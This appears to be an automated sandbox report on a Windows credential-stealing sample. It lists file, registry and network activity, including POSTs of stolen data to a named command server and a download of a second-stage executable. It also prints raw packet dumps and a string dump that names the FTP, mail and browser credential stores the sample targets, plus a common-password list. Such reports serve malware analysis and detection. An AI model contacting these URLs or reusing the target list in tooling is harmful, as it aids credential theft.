Analysis Date: 2014-08-24 20:40:44
MD5: 94cb4a0ebbcea31bc85e6336a2ece3a6
SHA1: 06e74d0e510d60c539d9fec5e93fd2c76d47893e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1830392cd438729fc1ea92af7ce289cf sha1: 66e171ff51719d3bf1e4a1c20549c6704e0499ce size: 73728
Section.rdata md5: ea55f1bb8edcc7d52cc0e03f8c79e7e9 sha1: 3961dc0a2888ccac22b88d8751f95a8d51f19f7f size: 4096
Section.data md5: 0e3985ee9fd1e01f5711048743c9c2d6 sha1: 2721855cfae386c77659dd3e166cdd300747881f size: 24576
Section.reloc md5: 5faf8dd48acce2423cc253c6da32a928 sha1: 7246b1c04af57b727d8aa786d186d545701ed1eb size: 8192
Timestamp: 2014-08-12 08:56:51
PEhash: 9ae13a4cf177c5c75f9215137a148c7b461aca1b
IMPhash: 65e9bbea53a9396550cbbe64462a7930

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\WinRAR\HWID ➝ NULL
Creates File: PIPE\samr
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\90765.bat
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ C:\WINDOWS\system32\cmd.exe

Network Details:

DNS: bgumban.com
Type: A
173.243.115.130
DNS: truongvietgroup.com
Type: A
221.132.33.23
HTTP POST: http://bgumban.com/photo/stream.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP POST: http://bgumban.com/photo/stream.php
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP GET: http://truongvietgroup.com/wp-content/plugins/goin.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Flows TCP: 192.168.1.1:1031 ➝ 173.243.115.130:80
Flows TCP: 192.168.1.1:1032 ➝ 173.243.115.130:80
Flows TCP: 192.168.1.1:1033 ➝ 221.132.33.23:80

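Raw Pcap
Note: the first two dumps are byte-identical POST requests; the 273 body bytes after the blank line at offset 0x10b match the Content-Length header. In the third dump the GET request ends at offset 0xc5; the bytes from 0xc6 onward are identical to the first dump at the same offsets, so they appear to be leftover capture-buffer content rather than data sent with the GET.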
0x00000000 (00000)   504f5354 202f7068 6f746f2f 73747265   POST /photo/stre
0x00000010 (00016)   616d2e70 68702048 5454502f 312e300d   am.php HTTP/1.0.
0x00000020 (00032)   0a486f73 743a2062 67756d62 616e2e63   .Host: bgumban.c
0x00000030 (00048)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a206964 656e7469 74792c20 2a3b713d   : identity, *;q=
0x00000060 (00096)   300d0a43 6f6e7465 6e742d4c 656e6774   0..Content-Lengt
0x00000070 (00112)   683a2032 37330d0a 436f6e6e 65637469   h: 273..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a43 6f6e7465   on: close..Conte
0x00000090 (00144)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x000000a0 (00160)   74696f6e 2f6f6374 65742d73 74726561   tion/octet-strea
0x000000b0 (00176)   6d0d0a43 6f6e7465 6e742d45 6e636f64   m..Content-Encod
0x000000c0 (00192)   696e673a 2062696e 6172790d 0a557365   ing: binary..Use
0x000000d0 (00208)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x000000e0 (00224)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x000000f0 (00240)   3b204d53 49452035 2e303b20 57696e64   ; MSIE 5.0; Wind
0x00000100 (00256)   6f777320 3938290d 0a0d0aff cfc7f5af   ows 98).........
0x00000110 (00272)   eb473f01 9390c498 899215c5 0fb7e4b4   .G?.............
0x00000120 (00288)   40308e1e d5573c74 67029659 deccb9ce   @0...W<tg..Y....
0x00000130 (00304)   09f1a2a8 941bc714 b4c96e35 86c63f51   ..........n5..?Q
0x00000140 (00320)   5182c79a 68017d52 a69ba96a 886169c7   Q...h.}R...j.ai.
0x00000150 (00336)   bb12a476 558f1ff0 d9f8f3c4 c971c44c   ...vU........q.L
0x00000160 (00352)   30d5547d 0549fcf7 0a050da8 7bf95036   0.T}.I......{.P6
0x00000170 (00368)   4bd771b1 d41312c4 9675266e c56621eb   K.q......u&n.f!.
0x00000180 (00384)   5c232ca7 7b6061a1 72c2d992 c769e6bf   \#,.{`a.r....i..
0x00000190 (00400)   e6bba817 801a9466 3e8ec57c 3c512e03   .......f>..|<Q..
0x000001a0 (00416)   ca101075 9a77aefa 9496c847 9e989d37   ...u.w.....G...7
0x000001b0 (00432)   02b2408e 65a8d88e 6f543fc7 82d4b9da   ..@.e...oT?.....
0x000001c0 (00448)   d42ba308 2974e42a 89e4360b 5f1d8644   .+..)t.*..6._..D
0x000001d0 (00464)   ceaaa2eb 82a39ba7 70a8feea 4acbcc5e   ........p...J..^
0x000001e0 (00480)   b35a92ba c71bdd2c c5147540 6ec55bd5   .Z.....,..u@n.[.
0x000001f0 (00496)   9cbcd140 ef282e23 bca26ac3 e5150bb9   ...@.(.#..j.....
0x00000200 (00512)   d690d8b7 56361c9c d66b08f8 5ed62fc9   ....V6...k..^./.
0x00000210 (00528)   906b3757 a52b9076 a97cdeb7            .k7W.+.v.|..

0x00000000 (00000)   504f5354 202f7068 6f746f2f 73747265   POST /photo/stre
0x00000010 (00016)   616d2e70 68702048 5454502f 312e300d   am.php HTTP/1.0.
0x00000020 (00032)   0a486f73 743a2062 67756d62 616e2e63   .Host: bgumban.c
0x00000030 (00048)   6f6d0d0a 41636365 70743a20 2a2f2a0d   om..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a206964 656e7469 74792c20 2a3b713d   : identity, *;q=
0x00000060 (00096)   300d0a43 6f6e7465 6e742d4c 656e6774   0..Content-Lengt
0x00000070 (00112)   683a2032 37330d0a 436f6e6e 65637469   h: 273..Connecti
0x00000080 (00128)   6f6e3a20 636c6f73 650d0a43 6f6e7465   on: close..Conte
0x00000090 (00144)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x000000a0 (00160)   74696f6e 2f6f6374 65742d73 74726561   tion/octet-strea
0x000000b0 (00176)   6d0d0a43 6f6e7465 6e742d45 6e636f64   m..Content-Encod
0x000000c0 (00192)   696e673a 2062696e 6172790d 0a557365   ing: binary..Use
0x000000d0 (00208)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x000000e0 (00224)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x000000f0 (00240)   3b204d53 49452035 2e303b20 57696e64   ; MSIE 5.0; Wind
0x00000100 (00256)   6f777320 3938290d 0a0d0aff cfc7f5af   ows 98).........
0x00000110 (00272)   eb473f01 9390c498 899215c5 0fb7e4b4   .G?.............
0x00000120 (00288)   40308e1e d5573c74 67029659 deccb9ce   @0...W<tg..Y....
0x00000130 (00304)   09f1a2a8 941bc714 b4c96e35 86c63f51   ..........n5..?Q
0x00000140 (00320)   5182c79a 68017d52 a69ba96a 886169c7   Q...h.}R...j.ai.
0x00000150 (00336)   bb12a476 558f1ff0 d9f8f3c4 c971c44c   ...vU........q.L
0x00000160 (00352)   30d5547d 0549fcf7 0a050da8 7bf95036   0.T}.I......{.P6
0x00000170 (00368)   4bd771b1 d41312c4 9675266e c56621eb   K.q......u&n.f!.
0x00000180 (00384)   5c232ca7 7b6061a1 72c2d992 c769e6bf   \#,.{`a.r....i..
0x00000190 (00400)   e6bba817 801a9466 3e8ec57c 3c512e03   .......f>..|<Q..
0x000001a0 (00416)   ca101075 9a77aefa 9496c847 9e989d37   ...u.w.....G...7
0x000001b0 (00432)   02b2408e 65a8d88e 6f543fc7 82d4b9da   ..@.e...oT?.....
0x000001c0 (00448)   d42ba308 2974e42a 89e4360b 5f1d8644   .+..)t.*..6._..D
0x000001d0 (00464)   ceaaa2eb 82a39ba7 70a8feea 4acbcc5e   ........p...J..^
0x000001e0 (00480)   b35a92ba c71bdd2c c5147540 6ec55bd5   .Z.....,..u@n.[.
0x000001f0 (00496)   9cbcd140 ef282e23 bca26ac3 e5150bb9   ...@.(.#..j.....
0x00000200 (00512)   d690d8b7 56361c9c d66b08f8 5ed62fc9   ....V6...k..^./.
0x00000210 (00528)   906b3757 a52b9076 a97cdeb7            .k7W.+.v.|..

0x00000000 (00000)   47455420 2f77702d 636f6e74 656e742f   GET /wp-content/
0x00000010 (00016)   706c7567 696e732f 676f696e 2e657865   plugins/goin.exe
0x00000020 (00032)   20485454 502f312e 300d0a48 6f73743a    HTTP/1.0..Host:
0x00000030 (00048)   20747275 6f6e6776 69657467 726f7570    truongvietgroup
0x00000040 (00064)   2e636f6d 0d0a4163 63657074 3a202a2f   .com..Accept: */
0x00000050 (00080)   2a0d0a41 63636570 742d456e 636f6469   *..Accept-Encodi
0x00000060 (00096)   6e673a20 6964656e 74697479 2c202a3b   ng: identity, *;
0x00000070 (00112)   713d300d 0a436f6e 6e656374 696f6e3a   q=0..Connection:
0x00000080 (00128)   20636c6f 73650d0a 55736572 2d416765    close..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x000000a0 (00160)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000b0 (00176)   4520352e 303b2057 696e646f 77732039   E 5.0; Windows 9
0x000000c0 (00192)   38290d0a 0d0a696e 6172790d 0a557365   8)....inary..Use
0x000000d0 (00208)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x000000e0 (00224)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x000000f0 (00240)   3b204d53 49452035 2e303b20 57696e64   ; MSIE 5.0; Wind
0x00000100 (00256)   6f777320 3938290d 0a0d0aff cfc7f5af   ows 98).........
0x00000110 (00272)   eb473f01 9390c498 899215c5 0fb7e4b4   .G?.............
0x00000120 (00288)   40308e1e d5573c74 67029659 deccb9ce   @0...W<tg..Y....
0x00000130 (00304)   09f1a2a8 941bc714 b4c96e35 86c63f51   ..........n5..?Q
0x00000140 (00320)   5182c79a 68017d52 a69ba96a 886169c7   Q...h.}R...j.ai.
0x00000150 (00336)   bb12a476 558f1ff0 d9f8f3c4 c971c44c   ...vU........q.L
0x00000160 (00352)   30d5547d 0549fcf7 0a050da8 7bf95036   0.T}.I......{.P6
0x00000170 (00368)   4bd771b1 d41312c4 9675266e c56621eb   K.q......u&n.f!.
0x00000180 (00384)   5c232ca7 7b6061a1 72c2d992 c769e6bf   \#,.{`a.r....i..
0x00000190 (00400)   e6bba817 801a9466 3e8ec57c 3c512e03   .......f>..|<Q..
0x000001a0 (00416)   ca101075 9a77aefa 9496c847 9e989d37   ...u.w.....G...7
0x000001b0 (00432)   02b2408e 65a8d88e 6f543fc7 82d4b9da   ..@.e...oT?.....
0x000001c0 (00448)   d42ba308 2974e42a 89e4360b 5f1d8644   .+..)t.*..6._..D
0x000001d0 (00464)   ceaaa2eb 82a39ba7 70a8feea 4acbcc5e   ........p...J..^
0x000001e0 (00480)   b35a92ba c71bdd2c c5147540 6ec55bd5   .Z.....,..u@n.[.
0x000001f0 (00496)   9cbcd140 ef282e23 bca26ac3 e5150bb9   ...@.(.#..j.....
0x00000200 (00512)   d690d8b7 56361c9c d66b08f8 5ed62fc9   ....V6...k..^./.
0x00000210 (00528)   906b3757 a52b9076 a97cdeb7            .k7W.+.v.|..


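Strings
Note: this is the sorted raw string dump of the sample; it interleaves imported API names, registry and file paths of FTP, mail and browser clients, a list of common passwords, the two URLs seen in the network section, and disassembly residue. Individual entries are not separately labelled by the report.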
..
\
\
  
g

2http://www.facebook.com/
abe2869f-9b47-4cd9-a358-c22904dba7f7
cmd.exe
 /c start "" "%s"
e() 
Info
jjjj
jjjjjj
runas
000000
0 0&000K0
0 0&0/050I0R0X0a0g0
0 0%070<0J0
0'020<0E0P0u0
0"0G0R0w0
0$0Y0u0
080S0n0
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
;'<0<9<Y<_<
<0=A=U=o=t=y=
<0<C<V<o<
=">1>@>
111111
11111111
112233
1*1E1`1{1
1<1x1}1
123123
123321
123456
1234567
12345678
123456789
1234567890
123abc
123qwe
182C2_2
1G132P2
1Q1_1x1
1q2w3e
1q2w3e4r
20292M2
'2, /+0&7!4-)1#
222222
2/3e3y3
2+3U3p3
2.5.29.37
: :&:,:2:8:>:D:J:P:V:\:b:h:n:t:z:
;2;E;`;
\32BitFtp.ini
3"3&3*3.32363:3>3B3F3J3N3R3V3Z3^3b3f3j3n3r3v3z3~3
3(353B3O3\3i3v3
;3+#>6.&
:,:3:B:
\3D-FTP
3D-FTP
4%414s4
4(4@4Y4~4
4/4J4t4
4'4Z4c4
4(5^5c5
4E4K4U4p4
=/=4=N=S=
>.?4?>?Y?
51565<5I5N5T5a5f5l5y5~5
525C5T5w5
5%50565<5A5G5P5V5`5~5
5:6S6f6
5A5W5`5o5
616D6X6l6
654321
6%606@6H6S6
666666
6$666;6M6R6d6i6{6
6?6K6]6i6{6
697^7u7
6J7]7n7}7
>6>N>j>
6':;:p:
=6>S>f>
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
7-737B7H7}7
7777777
7!7e7s7
7+808c8h8n8
7^8c8t8y8
;+;7;'<]<b<
:":7:S:g:
8$878F8
8"8(8.848:8@8F8L8R8X8^8d8j8p8v8|8
8"8(898>8D8
8 9+909?9D9J9X9i9
8$9A9`9
;/<8<A<J<Z<
8c8i8s8
8I9Z9k9
9):.:[:
9|$4r4
9$9*90969<9B9H9N9T9Z9`9f9l9r9x9~9
9#9(9=9B9G9L9Q9V9n9
9"9'9:9P9V9
9"9Z9l9
9D9N9m9
9D$(ub
?'?9?E?W?c?z?
<&=9=M=a=
9W9*;T;];f;
:=;a;|;
;&<A<\<|<
aaaaaa
abc123
Accept: */*
Accept-Encoding: identity, *;q=0
account.cfg
account.cfn
\Accounts
accounts.ini
\AceBIT
addrbk.dat
adidas
AdjustTokenPrivileges
Administrative Tools
advapi32.dll
:*:A:g:
>A>G>Q>l>
AllocateAndInitializeSid
amanda
=#=/=A=M=d=p=4?G?V?
:/:;;A;N;
andrew
angel1
angels
anthony
aPLib v1.01  -  the smaller the better :)
AppData
AppDir
asdfasdf
asdfgh
ashley
asshole
austin
bailey
banana
bandit
baseball
\BatMail
batman
benjamin
billgates
biteme
\BitKinex
bitkinex.ds
>)>B>K>T>\>
blabla
blahblah
BlazeFtp
\BlazeFtp
blessed
blessing
blink182
bookmark.dat
\Bromium
bubbles
\BulletProof Software
buster
Buttons
canada
cassie
CertCloseStore
CertEnumCertificatesInStore
CertOpenSystemStoreA
charlie
CheckTokenMembership
cheese
chelsea
chicken
christ
\ChromePlus
\Chromium
church
;	<(<><C<I<^<c<i<
Client Hash
CloseHandle
closesocket
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
cocacola
CoCreateGuid
CoCreateInstance
\CoffeeCup Software
CoInitializeEx
Common Administrative Tools
Common AppData
Common Documents
\Comodo
compaq
computer
Config Path
connect
Connection: close
Connections.txt
CONSTRAINT
Content-Encoding: binary
Content-Length:
Content-Length: %lu
Content-Type: application/octet-stream
ConvertSidToStringSidA
cookie
Cookies
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
corvette
CoTaskMemFree
CoUninitialize
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateStreamOnHGlobal
CreateToolhelp32Snapshot
creative
CredentialCheck
CredentialSalt
CredEnumerateA
CredFree
crypt32.dll
CryptAcquireCertificatePrivateKey
CryptDestroyKey
CryptExportKey
CryptGetUserKey
CryptReleaseContext
CryptUnprotectData
\CuteFTP
CUTEFTP
\Cyberduck
D$0;D$(
dakota
dallas
daniel
danielle
@.data
DataDir
DataDirBak
DataFolder
DataPath
%d.bat
Default
DEFDIR
 del 	  %0 
     del    	 %1  
DeleteFileA
DeluxeFTP
destiny
%d.exe
dexter
diamond
digital
Dir #%d
Directory
DisplayName
<?<D<J<n<s<y<
;'<d=j=w=
+D$P][_^
DPAPI: 
dragon
\drives.js
EasyFTP
?E?J?}?
EmailAddress
eminem
emmanuel
\Epic\Epic
ESTdb2.dat
\Estsoft\ALFTP
ExitProcess
ExpandEnvironmentStringsA
\ExpanDrive
ExpanDrive_Home
explorer.exe
FastStone Browser
FastTrack
Favorites.dat
\FileZilla
\filezilla.xml
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
Firefox
fireFTPsites.dat
\FlashFXP\3
\FlashFXP\4
\Flock\Browser\
flower
Folder
foobar
football
football1
FOREIGN
forever
freedom
FreeSid
FreshFTP
friend
friends
\Frigate3
FSProtocol
ftp://
FTP Commander
FTPCON
FTP CONTROL
FTP Count
FTP destination catalog
FTP destination password
FTP destination port
FTP destination server
FTP destination user
FtpDirectory
\FTP Explorer
FTP File%d
\FTPGetter
\FTPInfo
FtpIniName
ftplast.osd
FTP++.Link\shell\open\command
FTPList.db
ftplist.txt
FTP Navigator
FTPNow
FTP Now
FtpPassword
_FtpPassword
FtpPort
FTP profiles
\FTPRush
FtpServer
FTPShell
ftpshell.fsi
ftpsite.ini
FtpSite.xml
FtpUserName
FTPVoyager.ftp
FTPVoyager.qc
fuckoff
fuckyou
fuckyou1
full address:s:
:f:x:}:
gateway
genesis
george
GetCurrentDirectoryA
GetCurrentProcess
GetFileAttributesA
GetFileSize
GetHGlobalFromStream
gethostbyname
GetLastError
GetLocaleInfoA
GetModuleBaseNameW
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetNativeSystemInfo
GetPrivateProfileIntA
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GET %s HTTP/1.0
GetSidSubAuthority
GetSidSubAuthorityCount
GetSystemInfo
GetTempPathA
GetTickCount
GetTokenInformation
GetUserNameA
GetVersionExA
GetVersionExW
GetWindowLongA
GetWindowsDirectoryA
gfhjkm
ghbdtn
\GHISLER
ginger
\Global Downloader
GlobalLock
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Pro
GlobalUnlock
google
\Google\Chrome
\GPSoftware\Directory Opus
guitar
h0n0{0
hahaha
hannah
hardcore
harley
heaven
hello1
helpme
<-<H<h<
History
\History.dat
History.dat
:#:):H:M:S:r:w:
hockey
HostAdrs
HostDirName
Hostname
HostName
Host: %s
hotdog
http://
http://bgumban.com/photo/stream.php
<HTTPMail_Password2
HTTPMail Password2
HTTPMail Server
HTTPMail User Name
HTTP Password
https://
HTTP Server URL
http://truongvietgroup.com/wp-content/plugins/goin.exe
HTTP User
hunter
identification
identities
Identities
identitymgr
	if  		 exist 	   %1  	  goto 	
ilovegod
iloveyou
iloveyou!
iloveyou1
iloveyou2
IMAP Password
<IMAP_Password2
IMAP Password2
IMAP Port
IMAP Server
IMAP User
IMAP User Name
ImpersonateLoggedOnUser
inet_addr
inetcomm server passwords
InitialDirectory
InitialPath
\INSoftware\NovaFTP
InstallDir
Install_Dir
InstallDir1
InstallerDathPath
installpath
InstallPath
Install Path
internet
InternetCrackUrlA
InternetCreateUrlA
Internet Explorer
\Ipswitch
\Ipswitch\WS_FTP
IsRelative
IsTextUnicode
IsWow64Process
=@=]=j=
jasmine
jasper
jennifer
jessica
jesus1
john316
jordan
jordan23
joseph
joshua
junior
justin
kernel32.dll
killer
kitten
\K-Meleon
K-Meleon
knight
	   :ktk   
L$(9L$@
LastAddress
Last Directory3
Last Install Path
LastPassword
LastPort
Last Server Host
Last Server Pass
Last Server Path
Last Server Port
Last Server Type
Last Server User
LastSessionFile
LastUser
LCMapStringA
leapftp
\LeapWare\LeapFTP
letmein
LoadLibraryA
LoadUserProfileA
LocalAlloc
Local AppData
LocalDir
LocalFree
Location:
Login Data
logins
LogonUserA
london
looking
LookupPrivilegeValueA
lovely
loving
+L$PRQW
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrlenA
lstrlenW
?L?V?g?
=">M>_>
maggie
Mailbox.ini
\MapleStudio\ChromePlus
MapViewOfFile
master
matrix
matthew
maverick
maxwell
memset
merlin
michael
michelle
mickey
microsoft
\Microsoft\Windows Live Mail
\Microsoft\Windows Mail
Microsoft_WinInet_*
MNvDBVmKs6Dcxm2
monkey
More information: http://www.ibsensoftware.com/
mother
Mozilla
\Mozilla\Firefox\
\Mozilla\Profiles\
\Mozilla\SeaMonkey\
mozsqlite3.dll
msi.dll
MS IE FTP Passwords
MsiGetComponentPathA
msvcrt.dll
muffin
MultiByteToWideChar
mustang
mustdie
My Documents
My FTP
mylove
My Pictures
myspace1
nathan
NDSites.ini
netapi32.dll
NetApiBufferFree
\NetDrive
\NetSarang
NetUserEnum
NexusFile
\Nichrome
nicole
nintendo
NNTP Email Address
NNTP Password
NNTP Password2
NNTP Server
NNTP User Name
\Notepad++
nothing
NovaFTP.db
NppFTP.xml
nss3.dll
NSSBase64_DecodeBuffer
NSS_Init
NSS_Shutdown
.oeaccount
ole32.dll
OleInitialize
onelove
online
OpenProcess
OpenProcessToken
Opera.HTML\shell\open\command
orange
origin_url
?!?&?+?o?t?z?
Outlook
outlook account manager passwords
passw0rd
password
"password" : "
Password
_Password
PassWord
password1
password 51:b:
PasswordType
password_value
PathAppendW
PathToExe
peaches
peanut
pepper
Personal
PK11_Authenticate
PK11_FreeSlot
PK11_GetInternalKeySlot
PK11SDR_Decrypt
\Pocomail
\PocoSystem.ini
pokemon
POP3 Password
<POP3_Password2
POP3 Password2
POP3 Port
POP3 Server
POP3 User
POP3 User Name
PopAccount
PopPassword
PopPort
PopServer
PortNumber
POST %s HTTP/1.0
PPhnpA
praise
prayer
prefs.js
PRIMARY
prince
princess
Process32First
Process32Next
ProcessIdToSessionId
Profile
\Profiles
profiles.ini
profiles.xml
Program
ProgramDir
project.ini
psapi.dll
PSQRWV
pstorec.dll
PStoreCreateInstance
purple
qazwsx
QCHistory
QData.dat
quick.dat
\Quick.dat
qwerty
qwerty1
rachel
rainbow
`.rdata
ReadFile
\recentservers.xml
red123
RegCloseKey
RegCreateKeyA
RegEnumKeyExA
RegEnumValueA
RegOpenCurrentUser
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
RemoteDir
Remote Dir
RemoteDirectory
RevertToSelf
\RhinoSoft.com
richard
robert
\RockMelt
RootDirectory
rotimi
RushSite.xml
      "%s"   
S-1-5-18
samantha
samuel
scooby
scooter
SeaMonkey
SeAssignPrimaryTokenPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SECITEM_FreeItem
SeCreateTokenPrivilege
secret
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
select
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SeRestorePrivilege
Server
Server.Host
ServerList.xml
ServerName
Server.Pass
Server.Port
servers.xml
ServerType
Server Type
Server.User
\Sessions
SeTcbPrivilege
SetCurrentDirectoryA
setsockopt
<setting name="
SetUnhandledExceptionFilter
shadow
shalom
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\SharedSettings.ccs
\SharedSettings.sqlite
shell32.dll
ShellExecuteA
ShellExecuteExW
Shell_TrayWnd
SHGetFolderPathA
SHGetFolderPathW
shlwapi.dll
signons2.txt
signons3.txt
signons.sqlite
signons.txt
silver
single
site.dat
\SiteDesigner
SiteInfo.QFP
\sitemanager.xml
\Sites
Sites\
sites.dat
\Sites.dat
sites.db
SitesDir
SiteServer %d\Host
SiteServer %d\Remote Directory
SiteServer %d\SFTP
SiteServer %d-User
SiteServer %d-User PW
SiteServer %d\WebUrl
SiteServers
sites.ini
\sites.xml
sites.xml
%s\Keychain
slayer
SM.arch
\SmartFTP
\sm.dat
smokey
SmtpAccount
SMTP Email Address
SmtpPassword
SMTP Password
<SMTP_Password2
SMTP Password2
SmtpPort
SMTP Port
SmtpServer
SMTP Server
SMTP User
SMTP User Name
snoopy
soccer
soccer1
socket
Software\AceBIT
Software\Adobe\Common
Software\BPFTP
Software\BPFTP\Bullet Proof FTP\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BulletProof Software\BulletProof FTP Client\Options
Software\ChromePlus
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
Software\CoffeeCup Software
Software\CoffeeCup Software\Internet\Profiles
Software\Cryer\WebSitePublisher
Software\ExpanDrive
Software\ExpanDrive\Sessions
Software\Far2\Plugins\FTP\Hosts
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\Plugins\FTP\Hosts
Software\Far Manager\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\FileZilla
Software\FileZilla Client
Software\FlashFXP
Software\FlashFXP\3
Software\FlashFXP\4
Software\FlashPeak\BlazeFtp\Settings
Software\FTPClient\Sites
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTPWare\COREFTP\Sites
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\IncrediMail
SOFTWARE\LeapWare
Software\LeechFTP
Software\LinasFTP\Site Manager
Software\Martin Prikryl
Software\MAS-Soft\FTPInfo\Setup
Software\Microsoft\Internet Account Manager
Software\Microsoft\Internet Account Manager\Accounts
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Mozilla
Software\NCH Software\ClassicFTP\FTPAccounts
SOFTWARE\NCH Software\Fling\Accounts
Software\Nico Mak Computing\WinZip\FTP
Software\Nico Mak Computing\WinZip\mru\jobs
_Software\Opera Software
Software\Poco Systems Inc
Software\RimArts\B2\Settings
Software\RIT\The Bat!
Software\RIT\The Bat!\Users depot
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\Scripts
Software\SimonTatham\PuTTY\Sessions
Software\SoftX.org\FTPClient\Sites
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\South River Technologies\WebDrive\Connections
Software\TurboFTP
Software\VanDyke\SecureFX
Software\WinRAR
sparky
spirit
sqlite3_close
sqlite3_column_blob
sqlite3_column_bytes
sqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
SQLite format 3
Staff-FTP
startrek
starwars
STATUS-IMPORT-OK
stella
StgOpenStorage
StrCmpNIA
StrRChrIA
StrStrA
StrStrIA
StrStrIW
StrToIntA
summer
sunshine
superman
t3h]tA
tah0]A
taylor
Technology
tEhgbA
tEh}jA
tEhTbA
tEhtrA
TerminalType
TERMSRV/
TERMSRV/*
testing
testtest
tFhdcA
tFhOHA
t@h9gA
\The Bat!
t)h[fA
t@h@fA
t$h`gA
t$hhgA
t)h>iA
!This program cannot be run in DOS mode.
t@hOgA
t=hOHA
t-hOHA
t.hOHA
t(hOHA
thomas
tHSPPj%P
t$htaA
t)hTfA
thunder
Thunderbird
\Thunderbird
t"hwtA
tigger
TMTPWDFILE0TMTPKDFILE0TMTCRYPTED0TMT1.0
tQh'hA
trinity
trustno1
tSh>mA
tsh;UA
\TurboFTP
tYh0fA
u hOHA
UltraFXP
uM9l$D}G
UninstallString
UNIQUE
unleap.exe
UnloadUserProfile
UnmapViewOfFile
user32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
user.config
userenv.dll
UserID
Username
UserName
username:s:
username_value
V4`4j4t4~4
v89l$D|0
value="
_VanDyke\Config\Sessions
victory
\Visicom Media
_vsnwprintf
VWh2eA
VWPSQR
WaitForSingleObject
wand.dat
wcx_ftp.ini
Web Data
welcome
whatever
w%hc\A
WideCharToMultiByte
william
windows
winex="
WinFTP
WininetCacheCredentials
wininet.dll
\win.ini
winner
wisdom
wiseftp.ini
wiseftpsrvs.bin
wiseftpsrvs.ini
Working Directory
WriteFile
WSAStartup
WS_FTP
wsock32.dll
wsprintfA
WTSGetActiveConsoleSessionId
:";';X;
xflags
\Yandex
zxcvbnm
^_ZY[X
ZY[X_^